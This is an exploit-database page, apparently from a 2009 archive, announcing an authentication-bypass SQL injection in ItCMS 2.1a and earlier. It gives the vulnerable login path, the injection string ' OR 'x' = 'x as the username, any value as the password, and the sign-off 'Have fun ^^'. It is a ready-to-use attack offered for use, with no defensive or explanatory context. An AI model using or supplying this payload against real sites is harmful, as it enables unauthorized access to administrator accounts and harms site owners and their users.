[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : ItCMS <= 2.1a (Auth Bypass) SQL Injection Vulnerability
# Published : 2009-01-06
# Author : certaindeath
# Previous Title : Goople <= 1.8.2 (frontpage.php) Blind SQL Injection Exploit
# Next Title : playSMS 0.9.3 Multiple Remote/Local File Inclusion Vulnerabilities
__ .__ .___ __ .__
____ ____________/ |______ |__| ____ __| _/____ _____ _/ |_| |__
_/ ___/ __ _ __ ____ | |/ / __ |/ __ \__ \ __ |
__ ___/| | /| | / __ | | | / /_/ ___/ / __ | | | Y
___ >___ >__| |__| (____ /__|___| /____ |___ >____ /__| |___| /
/ / / / / / / /
--+++~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~+++--
--+++~~~~~ IT!CMS <= vers. SQL Injection Vulnerability ~~~~~+++--
--+++~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~+++--
[+] Discovered by: certaindeath
[+] Exploit: simple SQL injection
[+] Path: [cms dir]/login.php
[+] Username: ' OR 'x' = 'x
[+] Password: anything
[+] Have fun ^^
# www.Syue.com [2009-01-06]